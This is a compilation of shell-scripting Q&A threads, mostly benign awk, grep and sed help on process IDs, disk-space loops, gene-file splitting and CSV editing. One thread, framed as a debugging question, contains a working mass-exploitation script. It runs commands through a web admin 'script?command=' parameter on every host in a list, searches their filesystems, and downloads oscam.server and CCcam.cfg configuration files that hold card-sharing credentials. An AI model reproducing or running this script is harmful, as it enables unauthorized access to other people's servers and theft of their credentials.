Join conditions in awk - shell

How can I join this command
top -b -n 5 -d.2 | grep "Cpu" | awk 'NR==3{ print($2)}'
into only awk command (joining grep and awk into one) ?
I have tried this but with no success:
top -b -n 5 -d.2 | awk '{if( $1 == "Cpu(s):" && NR==3 ){ print($2)} }'
or
top -b -n 5 -d.2 | awk '{$1 ~ /Cpu/ && (NR==3) { print($2)}}'

awk '/Cpu/ {x++; if(x==3) { print $2}}'
Note: you can add exit for short-circuiting.

top -b -n 5 -d.2 | awk '/Cpu/ { if (++cnt==3) print $2 }'

Related

How to grep first match and second match(ignore first match) with awk or sed or grep?

> root# ps -ef | grep [j]ava | awk '{print $2,$9}'
> 45134 -Dapex=APEC
> 45135 -Dapex=JAAA
> 45136 -Dapex=APEC
I need to put the first APEC of first as First PID, third line of APEC and Second PID and last one as Third PID.
I've tried awk but no expected result.
> First_PID =ps -ef | grep [j]ava | awk '{print $2,$9}'|awk '{if ($0 == "[^0-9]" || $1 == "APEC:") {print $0; exit;}}'
Expected result should look like this.
> First_PID=45134
> Second_PID=45136
> Third_PID=45135
With your shown samples and attempts please try following awk code. Written and tested in GNU awk.
ps -ef | grep [j]ava |
awk '
{
val=$2 OFS $9
match(val,/([0-9]+) -Dapex=APEC ([0-9]+) -Dapex=JAAA\s([0-9]+)/,arr)
print "First_PID="arr[1],"Second_PID=",arr[3],"Third_PID=",arr[2]
}
'
How about this:
$ input=("1 APEC" "2 JAAA" "3 APEC")
$ printf '%s\n' "${input[#]}" | grep APEC | sed -n '2p'
3 APEC
Explanation:
input=(...) - input data in an array, for testing
printf '%s\n' "${input[#]}" - print input array, one element per line
grep APEC - keep lines containing APEC only
sed -n - run sed without automatic print
sed -n '2p' - print only the second line
If you just want the APECs first...
ps -ef |
awk '/java[ ].* -Dapex=APEC/{print $2" "$9; next; }
/java[ ]/{non[NR]=$2" "$9}
END{ for (rec in non) print non[rec] }'
If possible, use an array instead of those ordinally named vars.
mapfile -t pids < <( ps -ef | awk '/java[ ].* -Dapex=APEC/{print $2; next; }
/java[ ]/{non[NR]=$2} END{ for (rec in non) print non[rec] }' )
After read from everyone idea,I end up with the very simple solution.
FIRST_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '1p')
SECOND_PID=$(ps -ef | grep APEC | grep -v grep | awk '{print $2}'| sed -n '2p')
JAWS_PID=$(ps -ef | grep JAAA | grep -v grep | awk '{print $2}')

`df' unexpected' checking for diskspace inside a function using a while loop bash script

I am getting an issue where if I call this function below, I get the error line 89: syntax error at line 117: 'df' unexpected.
If I take the code out of the function it works fine.
Is there any reason for the error above?
This is a bash script on RHEL.
function testr{
df -H | grep -vE '^Filesystem|tmpfs|cdrom' | awk '{ print $5 " " $1 }' | while read output;
do
usep=$(echo $output | awk '{ print $1}' | cut -d'%' -f1)
partition=$(echo $output | awk '{ print $2 }')
(.. Sends alert via mail after)
done
}
Maybe a little easier to read this way?
testr_zsh () {
# This (only) works with zsh.
for usep partition in $( df -H | awk 'NR>1 && !/tmpfs|cdrom/{print $5,$1}' | sed -n '/%/s/%//p' )
do
echo "\$usep: $usep, \$partition: $partition"
done
}
testr () {
for fs in $( df -H | awk 'NR>1 && !/tmpfs|cdrom/{print $5"|"$1}' | sed -n '/%/s/%//p' )
do
usep="$(echo "${fs}" | sed 's/|.*//' )"
partition="$(echo "${fs}" | sed 's/.*|//' )"
echo "\$usep: $usep, \$partition: $partition"
done
}
On my computer not all lines that pass through the awk filter have % in them hence adding the sed filter. zsh allows two vars in the for loop which is pretty slick.

One liner working, but in bash script not working, why?

oneliner
curl "127.0.0.1:81/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++'
and bash style
#!/bin/sh
OSCAM="/webadmin/script?command=|ps%20-T%20-f" | grep oscam | awk 'BEGIN{IGNORECASE=1;oscam;RS="<br>"}; {print $11};' | awk '{print "/file?file="$0"/oscam.server"}' | awk '!x[$0]++' > oscam.source.tmp
URL2=$(cat oscam.source.tmp)
for URL in `cat links.md`; do echo $URL; curl -m 5 $1 "$URL$OSCAM" > oscam.source; curl -m 5 $1 "$URL$URL2"
done > oscam.server.new
the main problem for me on script didnt running normally, didnt gave an output for oscam.source.tmp
ok refined the script
now finally working :),
#!/bin/bash
for URL in $(< links.md); do echo curl -L -m 5 $1 "'"$URL"/webadmin/script?command=|find%20/etc%20/var%20/usr%20|%20egrep%20%22CCcam.cfg|oscam.server%22'" | bash - | egrep "oscam.server<br>|CCcam.cfg" | awk 'BEGIN{RS="<br>"} {print $1}' > oscam.source.bak && awk '!/^$/' oscam.source.bak | awk '$0="/file?file="$0' > oscam.temp;
for URL2 in $(< oscam.temp); do echo curl -L -m 5 $1 "$URL$URL2" | bash -
done
done > oscam.server.new

Bash Grep Takes 3 Days To Run. Anyway to Enhance it?

I have a script like this that I would like to seek some suggestions on enhancing it.
cd /home/output/
cat R*op.txt > R.total.op.txt
awk '{if( (length($8)>9) || ($8 ~ /^AAA/) ) {print $0}}' R.total.op.txt > temp && mv temp R.total.op.txt
cat S*op.txt > S.total.op.txt
awk '{if( (length($8)>9) || ($8 ~ /^AAA/) ) {print $0}}' S.total.op.txt > temp && mv temp S.total.op.txt
cat R.total.op.txt S.total.op.txt | awk '{print $4}' | sort -k1,1 | awk '!x[$1]++' > genes.txt
rm *total.op.txt
head genes.txt
cd /home/output/
for j in R1_with-genename R2_with-genename S1_with-genename S2_with-genename
do
**for i in `cat genes.txt`; do cat $j'.op.txt' | grep -w $i >> $j'_'$i'_gene.txt'**;done
done
ls -m1 *gene.txt | wc -l
find . -size 0 -delete
ls -m1 *gene.txt | wc -l
rm genes.txt
cd /home/output/
for i in `ls *gene.txt`
do
paste <(awk '{print $4"\t"$8"\t"$9"\t"$13}' $i | awk '!x[$1]++' | awk '{print $1}') <(awk '{print $4"\t"$8"\t"$9}' $i | awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | awk '{ sum += $3 } END { if (NR > 0) print sum / NR }') <(awk '{print $4"\t"$8"\t"$9}' $i| awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | wc -l) <(awk '{print $4"\t"$8"\t"$9"\t"$13}' $i | awk '{if( (length($2)>9) || ($2 ~ /^AAA/) ) {print $0}}' | sort -k2,2 | grep -v ":::" | wc -l) > $i'_stats.txt'
done
rm *gene.txt
cd /home/output/
for j in R1_with-genename R2_with-genename S1_with-genename S2_with-genename
do
cat $j*stats.txt > $j'.final.txt'
done
rm *stats.txt
cd /home/output/
for i in `ls *final.txt`
do
sed "1iGene_Name\tMean1\tCalculated\tbases" $i > temp && mv temp $i
done
head *final.txt
The very first for loop (marked with asterisks) that has cat genes.txt is the grep loop that is taking 3 days to finish. Can someone please advice any enhancements to the command and if this entire script can be made into a single command? Thanks in advance.
Try replacing the nested loops with a single awk.
awk 'FNR = NR {words[$0] = "\\b" $0 "\\b"; next}
{ for (i in words) if ($0 ~ words[i]) {
fn = FILENAME "_" i "_gene.txt";
print >> fn;
close(fn);
}' genes.txt {{R,S}{1,2}_with-genename}.op.txt
I suggest creating a sed script:
# name script
SEDSCRIPT=split.sed
# Make sure it is empty
echo "" > ${SEDSCRIPT}
# Loop through all the words in genes.txt and
# create sed command that will write that line to a file
for word in `cat genes.txt`; do
echo "/${word}/w ${word}.txt" >> ${SEDSCRIPT}
done
basenames="R1_with-genename R2_with-genename S1_with-genename S2_with-genename"
# Loop over input files
for name in "${basenames}"; do
# Run sed script against file
sed -n -f ${SEDSCRIPT} ${name}.op.txt
# Move the temporary files created by sed to their permanent names
for word in `cat genes.txt`; do
mv ${word}.txt ${name}_${word}_gene.txt
done
done

awk append in CSV file

How to use awk command, as I need to add or append a 000 to my below timestamp column. I try to use the below command,
head -n 10000001 ratings.csv | tail -n +2 | awk '{print $1 "000"}' >> ratings_1.csv
but data is not as expected.
$ cat ratings.csv |wc -l
20000264
$ head ratings.csv
userId,movieId,rating,timestamp
1,2,3.5,1112486027
1,29,3.5,1112484676
1,32,3.5,1112484819
1,47,3.5,1112484727
1,50,3.5,1112484580
1,112,3.5,1094785740
1,151,4.0,1094785734
1,223,4.0,1112485573
1,253,4.0,1112484940
My expected output should look like
1,2,3.5,1112486027000
awk '{ if (NR > 1) { $1 = $1 "000" } print }'
Maybe a faster version that wouldn't run the if on every line would be:
awk 'BEGIN { getline; print } { print $0 "000" }'

Resources